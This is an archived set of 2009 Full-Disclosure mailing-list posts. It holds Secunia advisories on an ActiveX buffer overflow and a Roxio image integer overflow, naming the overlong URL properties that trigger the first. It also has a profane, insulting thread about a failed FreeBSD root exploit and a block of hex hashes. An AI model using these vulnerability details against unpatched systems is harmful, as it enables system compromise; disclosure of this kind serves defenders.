wrong way. As previously reported by Alexandr Polyakov, the injection still works but impacts only confidentiality and integrity. Regards, -- Andrea Purificato http://rawlab.mindcreations.com From remove-vuln at secunia.com Wed Dec 2 11:53:35 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 2 Dec 2009 12:53:35 +0100 Subject: [Full-disclosure] Secunia Research: Lateral Arts Photobox uploader ActiveX Control Buffer Overflow Message-ID: <200912021153.nB2BrZGp018823@CA-IX-1.intnet> ====================================================================== Secunia Research 02/12/2009 - Lateral Arts uploader ActiveX Control Buffer Overflow - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Description of Vulnerability.........................................3 Solution.............................................................4 Time Table...........................................................5 Credits..............................................................6 References...........................................................7 About Secunia........................................................8 Verification.........................................................9 ====================================================================== 1) Affected Software * Lateral Arts Photobox uploader ActiveX Control 2.2.0.6 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Lateral Arts Photobox uploader ActiveX Control, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error when parsing URLs. This can be exploited to cause a stack-based buffer overflow via an overly long string assigned to a number of properties (e.g. "LogURL", "ConnectURL", "SkinURL", "AlbumCreateURL", "ErrorURL", and "httpsinglehost"). Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website. The vulnerability is confirmed in version 2.2.0.6. Other versions may also be affected. ====================================================================== 4) Solution According to the vendor (Lateral Arts), the vulnerability is fixed in version 1.3 of the upstream version. No fixed version is available for the Photobox 2.x branch. ====================================================================== 5) Time Table 02/11/2009 - Vendor (Lateral Arts) notified. 02/11/2009 - Vendor response. 11/11/2009 - Status update requested. 11/11/2009 - Vendor response (customers contacted). 18/11/2009 - Status update requested. 18/11/2009 - Vendor response. 25/11/2009 - Disclosure postponed. 30/11/2009 - Vendor provides status update. 02/12/2009 - Public disclosure. ====================================================================== 6) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-1567 for the vulnerability. ====================================================================== 8) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-41/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From Eddie.McGhee at ncr.com Tue Dec 1 18:15:14 2009 From: Eddie.McGhee at ncr.com (McGhee, Eddie) Date: Tue, 1 Dec 2009 13:15:14 -0500 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <8a1ab0ce0912010958v120ae976o137ed400f7141f34@mail.gmail.com> References: <8a1ab0ce0912010958v120ae976o137ed400f7141f34@mail.gmail.com> Message-ID: HE HAS THE GCC INSTALLED, FJEER. ________________________________ From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of r00f r00f Sent: 01 December 2009 17:59 To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] ** FreeBSD local r00t zeroday From: Oliver Pinter Date: Tue, 1 Dec 2009 18:28:33 +0100 ________________________________ On Tuesday 01 December 2009 12.59.59 r00f r00f wrote: I have a box with release 7.1 uname -a gives back this : FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux and a freebsd uname -a looks like this:..... IT gives me this : Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux From: FBI BOT Date: Tue, 1 Dec 2009 12:03:01 -0500 ________________________________ LOL r00f r00f didn't have gcc installed :-O OMG What are you saying ?? I have the gcc installed my friend.. i have just compile a .c file.. and if i type "gcc" it returns me gcc: No input files specified Ok ? Thanks! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/75169f12/attachment.html From Eddie.McGhee at ncr.com Tue Dec 1 19:52:12 2009 From: Eddie.McGhee at ncr.com (McGhee, Eddie) Date: Tue, 1 Dec 2009 14:52:12 -0500 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: <20091201194651.8F9E32803F@smtp.hushmail.com> References: <20091201194651.8F9E32803F@smtp.hushmail.com> Message-ID: N3td3v i am Scottish and coming for you're boxes In yer area wee man. Fjeer. -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of genesis project Sent: 01 December 2009 19:47 To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] BEGIN TRANSMISSION 7040dc5b9583e367068a06f25a7bce8a 93e085c3571947bb935af4c8e62df42e bd9859da693421728921176693226dbb 27d4a0a73b79efc8f229e709bf9c5858 b49b4e3ece77173db3a3ce246f31ba56 bfca9db2ba007b1c44e5fca8b8f05a0e 0da3451c72565616d07010df1b241737 0a6857b1895b228050776841b32affd6 4f47f89f28926ef6ea7300537664cbe4 760cebf1739ed06bb89f20ab3eb2f811 d3f949c42963ad5d5628bfdf75c374e3 93be00d1f1f8699f11a196c5d331d03a 1787abb29dc4727cc16b3fee8a2e92cb 6282f38dc06e7932c4f4b3c848d71e08 6ba17f76a3b93f26a42abaa1e631c0e3 39784740bbf93b2b83b0c58403943ee8 b5bf1ef91072822b2675945d4fc3bc59 d38bac3fcaedaed11fb3f1273248fbe0 e1315c4290e7af09ad8532f40842ab21 958ace1fe31a29df9e0ae7def01a72e9 1ea95dfa189f03e723d800a14740197c 987205d906e98d1e23c46659bfeb389a 5286827e25643a66b0d4823ee492004a 2481d318d6ea2ea2af10af64d2203ac6 02a3c07ae1f9662d4375d6586e6cce97 b7095f8e8a4e0a4bbc1155ef2c495b4f af671a4192a4ac0732da175185cb690c e5a48398e8bf9a9fe274421ea48e532d e95961cf8f47623bab5e3be8541c7aea b8f76f41598302462affd1fb917818b3 df89576229f264ae2c7aebd92f3eb5c1 ee6271d6d6f4dadd9d93f265446898d7 76763d316ec90789ae9ed3bda0f260b0 fd945157f527a52ce78b37a662ba3ae2 65845c483be88ac1b5be34cb4a39a062 b30f718f101a3967e471ae8827e8e2f2 3ad2e2f177788d06b6ddedf01d641864 c19975a84d2915d7de2e5aaca973aff3 268cbcea00e2ac78f497e3c40b5d6d16 baa6552f904cfe608733a290fb3b0348 8cef9785397784af320aad64d4a451fa 1185b5a82873f3b6a7af2e80b7000819 3a4af85f5803b75265e9d8483b311858 8d5ab13bf268d5af676f8d21b6463088 2a1c3be1c1fea0bb80a1242732f52003 1a052508cb706d60f970fc0b31929e2d 5c2a7806346bcd89a24678fa0e556b24 c34ea7f66d8adda39ab4d31a293944c5 2dfb7c91e7debc2c47028abba9878b8e a83842d1970b8b9361b28994bdea133e 9988fe16e6783b97f30dae9879b43108 f7c2adcf3501371516b5cd7c41afade0 3f92a19b63644fab656f38413ab99f49 bc3afe9ce52461a1a48203ad832b04da dca51c6e633166ad7361086ae604bc9e 3f02d51fa412af42fc8569a416a992b8 342c8599434faee181456f5ba1ecb89c 936f1f7c562f1d62383981f727770724 5e99612e8301260b3fe3f4310b301d69 dd5810c0a8b60b34c423dee8383323bc 001ebe4cfff9e32ef4ee19137485a2cd 8f5b148e2c3edcfc82f6b225a8642383 ca00bd55ba0164405edd8965f0f527be 83b70c007d10927fce8be15cd387e19f 10248928399d1a23d543a12fa2ce55f3 597e73653a1798f6c7ae859e6bcbb0af 50f6f302cdf09f97c35feb22353b7df5 f726a9833d6cb765241f5b5407c75aff 958ace1fe31a29df8b8df3134373bee0 1f6a7b08e47d947e0e5641802c9e4af6 666925ac26c0df66038ec6a2b05df1ff 6d3f62a326e6685a505463353c8f5dc3 58d29e01339ce1ebc04db879e36be2a1 f089a9ab5b3404d9e2dd14857a49fc15 cd7545c0c1c0ccaa220b8eb542a50a09 b984f08075ac64b29d0e0f06fbae8427 b2daa21b13c410b5265d2e4398365f2b f8b6f1db0c9b44adf497e3c40b5d6d16 e0603724697cc1c0c119adf3c4c2fbc3 3ddf0c148fee11380606ca727bc419e7 41e6e4a81e4e27411eee1fe5f0da834b 81079622b23ce42817262bbbdcde38c9 209d1e47a7bcb71d813b58bf4809881e 1488a239d560d41d987af10a94a1ecab fe20ecdaf9c90ec04ce346d85aed6d91 c32ee9c5be9c64cecef763decfad4dca 2907176aac354b46ebfec5d51a3f5294 cb53a79af06450347c2f041f78c73aa9 a3ecabc26e17d9213f92a19b63644fab 79ba44f07337f89707282e178959d582 3915966def8d5939b3dcaa99a0f63dfb 55ef531b7722a7f847183bb5cd62b448 2cbd414bdf1769637f121cafb1a4e42c 3f92a19b63644fab686ef611d64d4641 93bde960aca5996742dcf0680fee7558 9c3d2204d817bd95bbc5031eb85239a4 ad3b70730307b0924c3caf13dc6696fb de091866bed93da6582cbff43b18ad70 34c370a3e5eefb81290eebf586d15184 2871985cdc38e885b16836e8598f98c3 3aa1f46ba0b2e10ff1fe16987ab96eea f4894f0f34ab1e64d7461fb1bf45342f e221c95c7502b1d1a8a3cdc2cf7bd7aa 2012c9af47d83a325e1d0ccff62e6f64 654f6e35ce564578b242ade81f1a56ef 3bc2d195600ec07a0e16b72f946bcb5d 16f5408569724cd19b6bd8deb9070a7e e52e66188a45d27c4b6dc31ae3b202df c218181a6b95baf8c9331e3d07d06dde 83b66338d7bb3f5e4065fb8fa70656ca 4a1b0b72f02795fa3f92a19b63644fab 0df1df0e0383002a5988938195dbb95f 2a98945ce29d90a761f21d49a9fcaaff aa69c6e314fe570da60f9889f9b3f5b7 0ef3c0e63d60af7bf7bdbad9a56f92c1 e3304feb10c583e0414961201ead7711 dc4bf95b9e80405f0e5baa8088f200da 20d77139485e7dcb6f6802b339a56f44 a3bbcef064dcc7b317ee3b975ef28472 76561a553f3dd6908aa898fb892c4238 8853bd85b9c969c0bb0deabf92b01aab 35ba007891228128afdcaeaf3c75f4e7 955b6f31ad3bef73f204e86b358dc297 ea0ec008244731b21d8ef6c5e7e91dcc d7a9f71371167a91ad54212902f79cea 293c912e8749701beb0ec4c5946e41a8 a9438f75f0ca8520a372413806ff69e4 db0e4462db5db8fe3c72948e3c77c27c e4b78b2581d95ff7623c0a42459334da 9bf2fcbd6c442fdbba0ba3d2a740a4ee c8e82bbbed2d7e9d49be06c1b8f55d69 cccc9543acdfbdc6a78ced6d2c93dfe5 9096e859cf9b831a72357556d4c6efa0 63fe302dd2fc94021b857452dffee418 55024e629d64f1681d147e79d082ca43 b2d0166cbe8856873dc9f68a565fc385 194a35ce4915024a83bd142ef11623a0 3807189affca88837b55866d55ef3d9d e7a4d0b15aed6b3af543998ae2e30daf 26968709d7ef111df6e2f67eb4b1bfad 3e5dfd1c173169e488f27a97761c4f55 49e2092463c532e7d4b1df036b49ae64 628318b514345b9b690bcbef6d1cb48c 302d2de50749957722446cc8dd687648 a479b9040d6f040139df82f206abdbd2 9db938625926c0eeba87865e43b6b1db 194b5cc62b18ba57f402bf66d78012d6 4419b0f2c563262decde2e9ccab332a7 73521e12ca84441eefa7a98b25adc705 aae8ad240dc401b7cf321def52ae1cce acb630e1900e275250abf22d6ae13062 aa671f4cc4a8a0a602c52a6278bb4f2d 55f09792703c984f6321b1c5f929878f 050f32bdf3350f2ebc8921dd89ad848e ff215f1f313f322baaff624e7e458a9e 059002c7580d9558f49e50e9f7377df4 d6a24c1f2142abd103003338801da3a8 047dc4dff18bdd198d38c5512963620a eb7540536991d738b91d110bb8269b89 0d44b28da8fe881f091f2ad5522e008a 25a74e3446db34326cd21b3371a9a08c 90b44e7e53d3ade605c0f3d5a4618c4b 9e00fc8d31325c5d0c3ce21c0ae28193 aac3a86fa21196a4172291f4daf8c9df c9845d6996b41daa1242216ada091bb7 b711ae04ce0fc771ef0800f576e3e8ab 2f467e85ad7767c6cf31c40c4df46d74 1e2755823a16c89caa5c759c323b9f14 c11a7ace4c3954f299e15335d1042ccc a888c6bbad3434d54cd418a4ae94fe8d 51917f11d9f248d3ba3ad7cbc0e32269 4f8cfa5108f64571f5c365582fcdb6bd 25fff28dee2a9c2422446cc8dd687648 fc765f312565d13e36c7faa21fc52059 88c1f0da9986ca1a0cccf04e7941c058 494e0e793bf2b978051e0e63bd30685a 9064c122b0674b0ef780e8e79533d1ca b0237fdd8c8393ac12ddb22764fd913f d24f7abf637ca394c8c7c66406cc9e3a f491206098ecb0cc2bce5b6bf689483d 42f2b4d1fa8ebdc5 END TRANSMISSION _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From remove-vuln at secunia.com Wed Dec 2 12:27:17 2009 From: remove-vuln at secunia.com (Secunia Research) Date: Wed, 2 Dec 2009 13:27:17 +0100 Subject: [Full-disclosure] Secunia Research: Roxio Creator Image Rendering Integer Overflow Vulnerability Message-ID: <200912021227.nB2CRHiA020587@CA-IX-1.intnet> ====================================================================== Secunia Research 02/12/2009 - Roxio Creator Image Rendering Integer Overflow Vulnerability - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 ====================================================================== 1) Affected Software * Roxio Easy Media Creator 9.0.136 * Roxio Creator 2010 NOTE: Other versions may also be affected. ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "Easily capture, enhance, save and share your photo, video and audio projects". Product Link: http://www.roxio.com/enu/products/creator/suite/overview.html ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in Roxio Creator, which can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused by an integer overflow error when allocating memory for an image based on its dimensions and can be exploited to corrupt memory via a specially crafted image. Successful exploitation may allow execution of arbitrary code. The vulnerability is confirmed in version 9.0.136. Other versions may also be affected. ====================================================================== 5) Solution Apply Creator 2010 SP1. ====================================================================== 6) Time Table 17/09/2009 - Vendor notified. 30/09/2009 - Vendor response. 25/11/2009 - Status update requested. 30/11/2009 - Vendor provides status update. 02/12/2009 - Public disclosure. ====================================================================== 7) Credits Discovered by Carsten Eiram, Secunia Research. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-1566 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-38/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From r0ck at operamail.com Wed Dec 2 14:20:40 2009 From: r0ck at operamail.com (Chris) Date: Wed, 2 Dec 2009 08:20:40 -0600 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday Message-ID: <20091202142040.AA0977BD6E@ws5-10.us4.outblaze.com> r00f, you moron. Read the fucking code. Everything you need to know is in the fucking exploit. If you can't grasp it, you have no business running it. >"c1: error: unrecognized command line option "-fPIC ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > gcc: program.o: No such file or directory ^^^^^^^^^^^^^^^^^^^^^^^^^ If you want point-and-click exploits, go back to windows. Asshat. -- _______________________________________________ Surf the Web in a faster, safer and easier way: Download Opera 9 at http://www.opera.com Powered by Outblaze From me at b3nji.com Wed Dec 2 14:30:09 2009 From: me at b3nji.com (Benji) Date: Wed, 2 Dec 2009 14:30:09 +0000 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <20091202142040.AA0977BD6E@ws5-10.us4.outblaze.com> References: <20091202142040.AA0977BD6E@ws5-10.us4.outblaze.com> Message-ID: Just FYI, what you posted isn't code, but actually an error message. Just FYI. On Wednesday, December 2, 2009, Chris wrote: > r00f, you moron. ?Read the fucking code. ?Everything you need to know is in the fucking exploit. ?If you can't grasp it, you have no business running it. > >>"c1: error: unrecognized command line option "-fPIC > ? ? ? ? ? ? ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >> gcc: program.o: No such file or directory > ? ? ? ? ? ? ? ? ?^^^^^^^^^^^^^^^^^^^^^^^^^ > > If you want point-and-click exploits, go back to windows. ?Asshat. > > > -- > _______________________________________________ > Surf the Web in a faster, safer and easier way: > Download Opera 9 at http://www.opera.com > > Powered by Outblaze > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From tbiehn at gmail.com Wed Dec 2 15:11:18 2009 From: tbiehn at gmail.com (T Biehn) Date: Wed, 2 Dec 2009 10:11:18 -0500 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: References: <20091201194651.8F9E32803F@smtp.hushmail.com> Message-ID: <2d6724810912020711q5d477448w8bb8a1fe19eb1f3e@mail.gmail.com> Any hexadecimally represented 16 bytes is obviously an MD5. For those interested in finding signal where there is none: LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes. On Tue, Dec 1, 2009 at 2:52 PM, McGhee, Eddie wrote: > N3td3v i am Scottish and coming for you're boxes > > In yer area wee man. Fjeer. > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of genesis project > Sent: 01 December 2009 19:47 > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] > > BEGIN TRANSMISSION > > 7040dc5b9583e367068a06f25a7bce8a > 93e085c3571947bb935af4c8e62df42e > bd9859da693421728921176693226dbb > 27d4a0a73b79efc8f229e709bf9c5858 > b49b4e3ece77173db3a3ce246f31ba56 > bfca9db2ba007b1c44e5fca8b8f05a0e > 0da3451c72565616d07010df1b241737 > 0a6857b1895b228050776841b32affd6 > 4f47f89f28926ef6ea7300537664cbe4 > 760cebf1739ed06bb89f20ab3eb2f811 > d3f949c42963ad5d5628bfdf75c374e3 > 93be00d1f1f8699f11a196c5d331d03a > 1787abb29dc4727cc16b3fee8a2e92cb > 6282f38dc06e7932c4f4b3c848d71e08 > 6ba17f76a3b93f26a42abaa1e631c0e3 > 39784740bbf93b2b83b0c58403943ee8 > b5bf1ef91072822b2675945d4fc3bc59 > d38bac3fcaedaed11fb3f1273248fbe0 > e1315c4290e7af09ad8532f40842ab21 > 958ace1fe31a29df9e0ae7def01a72e9 > 1ea95dfa189f03e723d800a14740197c > 987205d906e98d1e23c46659bfeb389a > 5286827e25643a66b0d4823ee492004a > 2481d318d6ea2ea2af10af64d2203ac6 > 02a3c07ae1f9662d4375d6586e6cce97 > b7095f8e8a4e0a4bbc1155ef2c495b4f > af671a4192a4ac0732da175185cb690c > e5a48398e8bf9a9fe274421ea48e532d > e95961cf8f47623bab5e3be8541c7aea > b8f76f41598302462affd1fb917818b3 > df89576229f264ae2c7aebd92f3eb5c1 > ee6271d6d6f4dadd9d93f265446898d7 > 76763d316ec90789ae9ed3bda0f260b0 > fd945157f527a52ce78b37a662ba3ae2 > 65845c483be88ac1b5be34cb4a39a062 > b30f718f101a3967e471ae8827e8e2f2 > 3ad2e2f177788d06b6ddedf01d641864 > c19975a84d2915d7de2e5aaca973aff3 > 268cbcea00e2ac78f497e3c40b5d6d16 > baa6552f904cfe608733a290fb3b0348 > 8cef9785397784af320aad64d4a451fa > 1185b5a82873f3b6a7af2e80b7000819 > 3a4af85f5803b75265e9d8483b311858 > 8d5ab13bf268d5af676f8d21b6463088 > 2a1c3be1c1fea0bb80a1242732f52003 > 1a052508cb706d60f970fc0b31929e2d > 5c2a7806346bcd89a24678fa0e556b24 > c34ea7f66d8adda39ab4d31a293944c5 > 2dfb7c91e7debc2c47028abba9878b8e > a83842d1970b8b9361b28994bdea133e > 9988fe16e6783b97f30dae9879b43108 > f7c2adcf3501371516b5cd7c41afade0 > 3f92a19b63644fab656f38413ab99f49 > bc3afe9ce52461a1a48203ad832b04da > dca51c6e633166ad7361086ae604bc9e > 3f02d51fa412af42fc8569a416a992b8 > 342c8599434faee181456f5ba1ecb89c > 936f1f7c562f1d62383981f727770724 > 5e99612e8301260b3fe3f4310b301d69 > dd5810c0a8b60b34c423dee8383323bc > 001ebe4cfff9e32ef4ee19137485a2cd > 8f5b148e2c3edcfc82f6b225a8642383 > ca00bd55ba0164405edd8965f0f527be > 83b70c007d10927fce8be15cd387e19f > 10248928399d1a23d543a12fa2ce55f3 > 597e73653a1798f6c7ae859e6bcbb0af > 50f6f302cdf09f97c35feb22353b7df5 > f726a9833d6cb765241f5b5407c75aff > 958ace1fe31a29df8b8df3134373bee0 > 1f6a7b08e47d947e0e5641802c9e4af6 > 666925ac26c0df66038ec6a2b05df1ff > 6d3f62a326e6685a505463353c8f5dc3 > 58d29e01339ce1ebc04db879e36be2a1 > f089a9ab5b3404d9e2dd14857a49fc15 > cd7545c0c1c0ccaa220b8eb542a50a09 > b984f08075ac64b29d0e0f06fbae8427 > b2daa21b13c410b5265d2e4398365f2b > f8b6f1db0c9b44adf497e3c40b5d6d16 > e0603724697cc1c0c119adf3c4c2fbc3 > 3ddf0c148fee11380606ca727bc419e7 > 41e6e4a81e4e27411eee1fe5f0da834b > 81079622b23ce42817262bbbdcde38c9 > 209d1e47a7bcb71d813b58bf4809881e > 1488a239d560d41d987af10a94a1ecab > fe20ecdaf9c90ec04ce346d85aed6d91 > c32ee9c5be9c64cecef763decfad4dca > 2907176aac354b46ebfec5d51a3f5294 > cb53a79af06450347c2f041f78c73aa9 > a3ecabc26e17d9213f92a19b63644fab > 79ba44f07337f89707282e178959d582 > 3915966def8d5939b3dcaa99a0f63dfb > 55ef531b7722a7f847183bb5cd62b448 > 2cbd414bdf1769637f121cafb1a4e42c > 3f92a19b63644fab686ef611d64d4641 > 93bde960aca5996742dcf0680fee7558 > 9c3d2204d817bd95bbc5031eb85239a4 > ad3b70730307b0924c3caf13dc6696fb > de091866bed93da6582cbff43b18ad70 > 34c370a3e5eefb81290eebf586d15184 > 2871985cdc38e885b16836e8598f98c3 > 3aa1f46ba0b2e10ff1fe16987ab96eea > f4894f0f34ab1e64d7461fb1bf45342f > e221c95c7502b1d1a8a3cdc2cf7bd7aa > 2012c9af47d83a325e1d0ccff62e6f64 > 654f6e35ce564578b242ade81f1a56ef > 3bc2d195600ec07a0e16b72f946bcb5d > 16f5408569724cd19b6bd8deb9070a7e > e52e66188a45d27c4b6dc31ae3b202df > c218181a6b95baf8c9331e3d07d06dde > 83b66338d7bb3f5e4065fb8fa70656ca > 4a1b0b72f02795fa3f92a19b63644fab > 0df1df0e0383002a5988938195dbb95f > 2a98945ce29d90a761f21d49a9fcaaff > aa69c6e314fe570da60f9889f9b3f5b7 > 0ef3c0e63d60af7bf7bdbad9a56f92c1 > e3304feb10c583e0414961201ead7711 > dc4bf95b9e80405f0e5baa8088f200da > 20d77139485e7dcb6f6802b339a56f44 > a3bbcef064dcc7b317ee3b975ef28472 > 76561a553f3dd6908aa898fb892c4238 > 8853bd85b9c969c0bb0deabf92b01aab > 35ba007891228128afdcaeaf3c75f4e7 > 955b6f31ad3bef73f204e86b358dc297 > ea0ec008244731b21d8ef6c5e7e91dcc > d7a9f71371167a91ad54212902f79cea > 293c912e8749701beb0ec4c5946e41a8 > a9438f75f0ca8520a372413806ff69e4 > db0e4462db5db8fe3c72948e3c77c27c > e4b78b2581d95ff7623c0a42459334da > 9bf2fcbd6c442fdbba0ba3d2a740a4ee > c8e82bbbed2d7e9d49be06c1b8f55d69 > cccc9543acdfbdc6a78ced6d2c93dfe5 > 9096e859cf9b831a72357556d4c6efa0 > 63fe302dd2fc94021b857452dffee418 > 55024e629d64f1681d147e79d082ca43 > b2d0166cbe8856873dc9f68a565fc385 > 194a35ce4915024a83bd142ef11623a0 > 3807189affca88837b55866d55ef3d9d > e7a4d0b15aed6b3af543998ae2e30daf > 26968709d7ef111df6e2f67eb4b1bfad > 3e5dfd1c173169e488f27a97761c4f55 > 49e2092463c532e7d4b1df036b49ae64 > 628318b514345b9b690bcbef6d1cb48c > 302d2de50749957722446cc8dd687648 > a479b9040d6f040139df82f206abdbd2 > 9db938625926c0eeba87865e43b6b1db > 194b5cc62b18ba57f402bf66d78012d6 > 4419b0f2c563262decde2e9ccab332a7 > 73521e12ca84441eefa7a98b25adc705 > aae8ad240dc401b7cf321def52ae1cce > acb630e1900e275250abf22d6ae13062 > aa671f4cc4a8a0a602c52a6278bb4f2d > 55f09792703c984f6321b1c5f929878f > 050f32bdf3350f2ebc8921dd89ad848e > ff215f1f313f322baaff624e7e458a9e > 059002c7580d9558f49e50e9f7377df4 > d6a24c1f2142abd103003338801da3a8 > 047dc4dff18bdd198d38c5512963620a > eb7540536991d738b91d110bb8269b89 > 0d44b28da8fe881f091f2ad5522e008a > 25a74e3446db34326cd21b3371a9a08c > 90b44e7e53d3ade605c0f3d5a4618c4b > 9e00fc8d31325c5d0c3ce21c0ae28193 > aac3a86fa21196a4172291f4daf8c9df > c9845d6996b41daa1242216ada091bb7 > b711ae04ce0fc771ef0800f576e3e8ab > 2f467e85ad7767c6cf31c40c4df46d74 > 1e2755823a16c89caa5c759c323b9f14 > c11a7ace4c3954f299e15335d1042ccc > a888c6bbad3434d54cd418a4ae94fe8d > 51917f11d9f248d3ba3ad7cbc0e32269 > 4f8cfa5108f64571f5c365582fcdb6bd > 25fff28dee2a9c2422446cc8dd687648 > fc765f312565d13e36c7faa21fc52059 > 88c1f0da9986ca1a0cccf04e7941c058 > 494e0e793bf2b978051e0e63bd30685a > 9064c122b0674b0ef780e8e79533d1ca > b0237fdd8c8393ac12ddb22764fd913f > d24f7abf637ca394c8c7c66406cc9e3a > f491206098ecb0cc2bce5b6bf689483d > 42f2b4d1fa8ebdc5 > > END TRANSMISSION > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on http://pastebin.com/f6fd606da From Eddie.McGhee at ncr.com Wed Dec 2 17:07:28 2009 From: Eddie.McGhee at ncr.com (McGhee, Eddie) Date: Wed, 2 Dec 2009 12:07:28 -0500 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] In-Reply-To: <4b6ee9310912020854y1697ad3cgbe4ffdf60a468ef7@mail.gmail.com> References: <20091201194651.8F9E32803F@smtp.hushmail.com> <4b6ee9310912020854y1697ad3cgbe4ffdf60a468ef7@mail.gmail.com> Message-ID: O that's ok then, I am not coming now. -----Original Message----- From: xploitable at gmail.com [mailto:xploitable at gmail.com] On Behalf Of andrew.wallace Sent: 02 December 2009 16:55 To: full-disclosure at lists.grok.org.uk; McGhee, Eddie Subject: Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v] It's not me its an impersonation. On Tue, Dec 1, 2009 at 7:52 PM, McGhee, Eddie wrote: > N3td3v i am Scottish and coming for you're boxes > > In yer area wee man. Fjeer. > > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of > genesis project > Sent: 01 December 2009 19:47 > To: full-disclosure at lists.grok.org.uk > Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / > n3td3v] > > BEGIN TRANSMISSION > > 7040dc5b9583e367068a06f25a7bce8a > 93e085c3571947bb935af4c8e62df42e > bd9859da693421728921176693226dbb > 27d4a0a73b79efc8f229e709bf9c5858 > b49b4e3ece77173db3a3ce246f31ba56 > bfca9db2ba007b1c44e5fca8b8f05a0e > 0da3451c72565616d07010df1b241737 > 0a6857b1895b228050776841b32affd6 > 4f47f89f28926ef6ea7300537664cbe4 > 760cebf1739ed06bb89f20ab3eb2f811 > d3f949c42963ad5d5628bfdf75c374e3 > 93be00d1f1f8699f11a196c5d331d03a > 1787abb29dc4727cc16b3fee8a2e92cb > 6282f38dc06e7932c4f4b3c848d71e08 > 6ba17f76a3b93f26a42abaa1e631c0e3 > 39784740bbf93b2b83b0c58403943ee8 > b5bf1ef91072822b2675945d4fc3bc59 > d38bac3fcaedaed11fb3f1273248fbe0 > e1315c4290e7af09ad8532f40842ab21 > 